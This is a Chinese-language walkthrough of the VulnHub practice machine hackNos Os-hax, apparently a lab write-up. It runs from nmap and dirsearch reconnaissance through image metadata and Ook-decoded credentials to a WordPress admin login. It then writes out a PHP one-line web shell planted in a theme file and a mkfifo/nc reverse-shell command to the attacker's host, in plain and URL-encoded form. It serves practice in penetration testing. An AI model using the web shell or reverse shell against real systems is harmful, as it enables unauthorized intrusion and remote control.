靶机地址:https://www.vulnhub.com/entry/hacknos-os-hax,389/
一、信息收集
步骤一:导入并配置靶机为桥接模式而后开启...获取其MAC地址信息...如下:
步骤二:主机发现
nmap 192.168.7.0/24
对应靶机的MAC地址得到IP为192.168.7.204
步骤三:端口扫描
nmap -sV -p- 192.168.7.204
得到开放的端口为22——ssh服务,80——http服务
步骤四:浏览器访问
步骤五:使用dirsearch扫描目录的时候查看页面有没有关键功能点
发现无特殊功能点😭
dirsearch -u http://192.168.7.204/
步骤六:拼接/img
点击到flaghost.png图片后,出现:
也许是图片隐写,那就将图片拖到kali中, 查看图片属性,得到字符 passw@45
exiftool flaghost.png
步骤七:拼接wordpress/wp-login.php,发现一个登录框
很明显这是使用了Wordpress的CMS
拼接/wordpress/
发现站点点击链接进行跳转的时候是localhost这个地址,那就需要对其进行绑定
在burp中对靶机的IP与localhost进行绑定
刷新,发现网页恢复正常
步骤八:弱口令登录发现登录不成功
根据上方得到的字符 passw@45
先猜想为密码,使用wordpress默认用户名登录,无果
猜想为页面目录,访问http://172.16.1.197/passw@45
步骤九:点击flag2.txt,显示
使用在线解密网站:https://www.splitbrain.org/services/ook
解密成功 账号密码 web Hacker@4514
点击Users查看用户,发现web用户是超级管理员
二、WebShell
可以通过写主题拿Webshell,点击Appearance—>Theme Editor—>header.php写入一句话木马..保存通过首页进行访问...
system($_REQUEST['cmd']);
访问?cmd=id
步骤十:使用BP抓包并将数据包修改为POST
请求,修改cmd
的值为以下反弹shell
的语法并在Kali
攻击机上使用nc
监听本地4455
端口接收shell
反弹...
反弹shell语句
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.7.250 4455 >/tmp/f
输入后选中反弹语句,Ctrl+u进行URL编码为
rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|sh+-i+2>%261|nc+192.168.7.250+4455+>/tmp/f
反弹成功